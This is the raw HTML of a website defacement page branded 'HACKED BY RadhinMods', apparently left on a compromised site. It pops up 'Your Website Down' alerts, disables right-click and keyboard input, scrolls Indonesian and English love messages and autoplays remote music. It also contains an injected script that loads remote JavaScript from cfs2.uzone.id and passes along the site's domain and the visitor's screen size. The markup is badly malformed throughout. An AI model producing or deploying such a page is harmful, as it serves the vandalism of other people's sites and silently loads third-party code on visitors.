<html>
<meta name="viewport" content="width=device-width, user-scalable=no" />
<header>
<body oncontextmenu="return false" onkeydown="return false" onmousedown="return false">


<head>
    <style type="text/css"> 
 
 
body {background:#000000 url('https://i.pinimg.com/originals/8c/d4/b9/8cd4b92b247cdcc25dc628e306a74739.jpg') repeat scroll center 0;
 
<head>
</head>
<background src="https://i.pinimg.com/originals/8c/d4/b9/8cd4b92b247cdcc25dc628e306a74739.jpg">
<body style="text-align: center;">
<br><br><br><br><br><br><br><br>
<script>alert("Your Website Down"); alert("Why?"); alert("Hacked By RadhinMods"); </script>
  <meta charset="utf-8">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  <title>HACKED BY RadhinMods</title><meta property="og:description" content="I love you, and I still survive"/>	
  <meta property="og:image" content="https://wallpapercave.com/wp/wp3921057.jpg"/>

  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="robots" content="noindex, nofollow">
  <style>
    @media screen and (max-width:500px) {
      body { font-size: .6em; }
    }
  </style>
</head>
<background src="https://i.pinimg.com/originals/8c/d4/b9/8cd4b92b247cdcc25dc628e306a74739.jpg">
<body style="text-align: center;">
<br><br><br><br><br><br><br><br>
<center><img src="https://wallpapercave.com/wp/wp3921057.jpg" width=300px height=300px>
  <h1 style="font-family: Georgia, serif; color:White; margin-top: 1em; line-height: 1.5;">
    Radhin ft WansGansXpL<br>
  <h2 style="  font-family: Verdana, serif; color:red; margin font-weight: 300;">
     [!] MASSAGE [!]
     <font face="trade Winds" size="6"><marquee direction="left" scrollamount="20" width="100%">_____________</marquee></font></b></div></span>
     
     <h2 style="  font-family: Verdana, sans-serif; color:White; margin font-weight: 300;">Kalau kamu jadi senar gitar, aku nggak mau jadi gitarisnya karena aku nggak mau mutusin kamu
    
     <h2 style="  font-family: Verdana, serif; color:red; margin font-weight: 300;">
    
     <font face="trade Winds" size="6"><marquee direction="right" scrollamount="20" width="100%">_____________</marquee></font></b></div></span>
     
     <h2 style="  font-family: Verdana, serif; color:red; margin font-weight: 300;">
     [!] DEAR YOU [!]
     
     <font face="trade Winds" size="6"><marquee direction="left" scrollamount="20" width="100%">_____________</marquee></font></b></div></span>
     
     <h2 style="  font-family: Verdana, sans-serif; color:White; margin font-weight: 300;">Mungkin di saat ini aku hanya bisa menahan kerinduan ini. Sampai tiba saatnya nanti aku bisa bertemu dan melepaskan kerinduan ini bersamamu
     
      <h2 style="  font-family: Verdana, serif; color:red; margin font-weight: 300;">
     
     <font face="trade Winds" size="6"><marquee direction="right" scrollamount="20" width="100%">_____________</marquee></font></b></div></span>
     
     <h2 style="  font-family: Verdana, sans-serif; color:red;font-face: 300;">[ Play Music ]
     <b 
     </h3>
     <center><audio autoplay="autoplay" controls="controls" src="https://e.top4top.io/m_1873b6ev70.mp3"type="audio/mpeg"></audio></center></body></html>
     </script>
     
     <script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript">
     <winds><winds>
     </script>
     
    <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssKPgeGmFQGrgR1HXyfS%2fplvFJ1IJVqxDTXWbkKtCLHqMcNtOzzIAa3LYu%2fxmu%2fXYppcRv%2fBl%2beQhKvqffLr4HQmAdcSNuXg%2bvImaqSFMTTOo1ddoZdm4l51kVsxFr%2f3RkuM2qFv1fqD2MndvaUKQ0Vl1nCLH%2b9vWoyPmfvxvBkZj6tNnE13asv5aiVS%2fHCZM%2fF0Qw94TQ5DK5wldln1fRBR9zzvfrrSopeEB7RlW1iqXeAsy7u8ZekIgZo8xhT1F4%2b6bgK3P%2fENJoFVBIDGGwUqfqgdZC9SzzIZRDK3iaVXugSp8G%2f%2bXGdH5barZ7qXMMYvEouwDFTubyevYfm0PAPoPZsErwQk8JydlXDpTbl4jmghTQKvPYt26rJx6vVA8SEeRgYoXuvOyiMCAM3EF7WzaE6A4rPvCRTYDG16lV3wUoV8dITeC3tplZK4Iec%2f5htqMObrHn%2b1kiCa3San7wgBGuofJDXUDG27%2fxOAhE5CPkQ%2fzXpyJshEg%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
    <div id="foter" class="foter" color=#000000 style="position: fixed; top: 75px; left: -235px; width: 600px; padding: 10px; font-size: 16px; text-align: center; color:white; font-family: &#39;trebuchet ms&#39;, verdana, arial, sans-serif;transform: rotate(-45deg);transform-origin: 50% 0px;-o-transform: rotate(-45deg); -o-transform-origin: 50% 0px;-moz-transform: rotate(-45deg); -moz-transform-origin: 50% 0px; -webkit-transform: rotate(-45deg); -webkit-transform-origin: 50% 0px; background-color: rgb(0, 0, 0); border: 1px solid rgb(170, 170, 170); z-index: 9999; opacity: 0.5;"><b>
    <font face="trade Winds" size="5"><marquee direction="right" scrollamount="8" width="50%">I like you, I love you, I love you so much, I'm really comfortable with you and I'm afraid of losing you :)</marquee></font></b></div></span>
    <font face="trade Winds" size="2"><marquee direction="left" scrollamount="9" width="80%">I like you, I love you, I love you so much, I'm really comfortable with you and I'm afraid of losing you :)</marquee></font></b></div></span>
  </h3>
  <br><br><br><br><br><br><br><br>
  </script>
  <script language="JavaScript" src="js/countdown.js"></script>
  </h4>
  </div> 
  </td>
  </tr>
  </table>
 
  </body>
  </html>      </td>
  </tr>
  </table>

</body>

</html>